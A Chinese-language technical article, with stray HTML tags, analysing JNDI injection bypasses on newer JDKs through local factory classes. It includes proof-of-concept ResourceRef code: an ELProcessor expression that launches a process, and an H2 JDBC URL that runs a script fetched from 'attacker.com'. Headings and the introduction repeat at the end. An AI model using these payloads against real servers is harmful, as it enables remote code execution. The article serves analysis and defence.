JDK高版本下JNDI注入深度剖析与绕过技术<\/h1>

1. JNDI注入基础概念<\/h2>
JNDI (Java Naming and Directory Interface) 是Java提供的一个API，用于访问命名和目录服务。JNDI注入漏洞是指攻击者通过控制JNDI查找的名称，导致应用执行恶意代码的安全漏洞。<\/p>

2. JDK高版本中的安全限制<\/h2>

2.1 RMI协议限制<\/h3>

在JDK高版本中，RMI协议的JNDI注入受到以下限制：<\/p>

RegistryContext#decodeObject<\/strong>方法中新增了条件判断：<\/p>

默认trustURLCodebase<\/code>为false<\/li>
如果ref.getFactoryClassLocation()<\/code>返回非空值，会抛出异常<\/li> <\/ul> <\/li>
关键代码路径：<\/p> \/\/ RegistryContext.java <\/span><\/span><\/span><\/span>if<\/span> (!<\/span>trustURLCodebase &&<\/span> ref !=<\/span> null<\/span> &&<\/span> ref.<\/span>getFactoryClassLocation<\/span>()<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> ConfigurationException(...);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2.2 LDAP协议限制<\/h3> LDAP协议的限制体现在：<\/p> DirectoryManager.getObjectInstance()<\/strong>方法中：<\/p> com.sun.jndi.ldap.object.trustURLCodebase<\/code>默认为false<\/li> 阻止了远程类的加载<\/li> <\/ul> <\/li> 关键代码：<\/p> \/\/ DirectoryManager.java <\/span><\/span><\/span><\/span>if<\/span> (!<\/span>TRUST_URL_CODE_BASE)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> ConfigurationException(...);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. JDK高版本中的绕过技术<\/h2> 3.1 LDAP协议绕过（JDK17）<\/h3> 在JDK17中，可以通过反序列化绕过：<\/p> Obj.decodeObject<\/strong>方法中存在反序列化路径<\/li> 关键条件： if<\/span> (!<\/span>VersionHelper.<\/span>isSerialDataAllowed<\/span>())<\/span> {<\/span> <\/span><\/span> \/\/ JDK17中此条件为true，允许反序列化 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 利用方式：使用已知的gadget链（如CC6）<\/li> 通过反序列化执行恶意代码<\/li> <\/ul> <\/li> <\/ol> 3.2 RMI协议绕过<\/h3> RMI协议的绕过思路：<\/p> 使ref.getFactoryClassLocation()<\/code>返回null<\/p> 实例化ResourceRef<\/code>时设置factoryLocation<\/code>为null<\/li> <\/ul> <\/li> 利用本地存在的工厂类：<\/p> 寻找实现ObjectFactory<\/code>接口的工厂类<\/li> 利用工厂类的getObjectInstance<\/code>方法<\/li> <\/ul> <\/li> <\/ol> 3.3 可利用的工厂类分析<\/h3> 3.3.1 BeanFactory (org.apache.naming.factory.BeanFactory)<\/h4> 利用条件<\/strong>：<\/p> Tomcat8依赖环境中存在<\/li> 需要ResourceRef<\/code>实例<\/li> <\/ul> 利用过程<\/strong>：<\/p> 设置beanClassName<\/code>为javax.el.ELProcessor<\/code><\/li> 设置forceString<\/code>属性为x=eval<\/code><\/li> 通过反射调用eval<\/code>方法执行恶意表达式<\/li> <\/ol> POC示例<\/strong>：<\/p> ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span> "org.apache.naming.factory.BeanFactory"<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','\/c','calc']).start()\")"<\/span>));<\/span> <\/span><\/span><\/code><\/pre>3.3.2 MemoryUserDatabaseFactory (org.apache.catalina.users.MemoryUserDatabaseFactory)<\/h4> 利用方式1：XXE文件读取<\/strong><\/p> 设置pathname<\/code>为恶意XML文件URL<\/li> 利用open()<\/code>方法解析XML时触发XXE<\/li> <\/ol> 利用方式2：文件写入<\/strong><\/p> 结合BeanFactory<\/code>创建必要目录<\/li> 通过save()<\/code>方法写入文件<\/li> <\/ol> 3.3.3 BasicDataSourceFactory (org.apache.commons.dbcp2.BasicDataSourceFactory)<\/h4> 利用方式<\/strong>：<\/p> 通过JDBC连接执行恶意操作<\/li> 支持多种数据库： H2数据库：通过SQL注入执行命令<\/li> Apache Derby：通过SQL加载JAR执行代码<\/li> <\/ul> <\/li> <\/ol> POC示例<\/strong>：<\/p> ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"org.apache.commons.dbcp2.BasicDataSource"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span> "org.apache.commons.dbcp2.BasicDataSourceFactory"<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"driverClassName"<\/span>,<\/span> "org.h2.Driver"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"url"<\/span>,<\/span> "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http:\/\/attacker.com\/evil.sql'"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"username"<\/span>,<\/span> "root"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"password"<\/span>,<\/span> "password"<\/span>));<\/span> <\/span><\/span><\/code><\/pre>3.3.4 DruidDataSourceFactory (com.alibaba.druid.pool.DruidDataSourceFactory)<\/h4> 特殊能力<\/strong>：<\/p> 支持初始化SQL语句执行<\/li> 可用于加载恶意JAR或执行系统命令<\/li> <\/ul> 3.3.5 GenericNamingResourcesFactory (org.apache.tomcat.jdbc.naming.GenericNamingResourcesFactory)<\/h4> 利用方式<\/strong>：<\/p> 通过setProperty<\/code>方法调用setter<\/li> 可利用的setter： org.apache.commons.configuration2.SystemConfiguration.setSystemProperties<\/code><\/li> com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase.setUserOverridesAsString<\/code>（反序列化）<\/li> <\/ul> <\/li> <\/ol> 4. JDK21中的新限制<\/h2> 在JDK21中新增了更严格的限制：<\/p> 使用NamingManagerHelper.getObjectInstance<\/code>替代原方法<\/li> 新增ObjectFactoriesFilter<\/code>检查：只允许jdk.naming.rmi\/com.sun.jndi.rmi.**<\/code>开头的包名<\/li> 阻止了大多数第三方工厂类的利用<\/li> <\/ul> <\/li> <\/ol> 5. 防御建议<\/h2> 升级到最新JDK版本<\/li> 限制JNDI查找的来源<\/li> 禁用不必要的JNDI服务<\/li> 使用安全管理器限制敏感操作<\/li> 定期审计依赖库中的工厂类<\/li> <\/ol> 6. 总结<\/h2> JDK高版本虽然增加了对JNDI注入的防护，但通过精心构造的利用链仍然可能实现攻击。安全防护需要从多个层面进行，包括但不限于：<\/p> 及时更新JDK和依赖库<\/li> 严格控制反序列化操作<\/li> 限制网络访问权限<\/li> 实施最小权限原则<\/li> <\/ul> 攻击者与防御者的对抗将持续演进，保持安全意识和技术更新是关键。<\/p>

JDK高版本下JNDI注入深度剖析与绕过技术<\/h1>

1. JNDI注入基础概念<\/h2> JNDI (Java Naming and Directory Interface) 是Java提供的一个API，用于访问命名和目录服务。JNDI注入漏洞是指攻击者通过控制JNDI查找的名称，导致应用执行恶意代码的安全漏洞。<\/p>

2. JDK高版本中的安全限制<\/h2>

3. JDK高版本中的绕过技术<\/h2>

3.3 可利用的工厂类分析<\/h3>

1. JNDI注入基础概念<\/h2>
JNDI (Java Naming and Directory Interface) 是Java提供的一个API，用于访问命名和目录服务。JNDI注入漏洞是指攻击者通过控制JNDI查找的名称，导致应用执行恶意代码的安全漏洞。<\/p>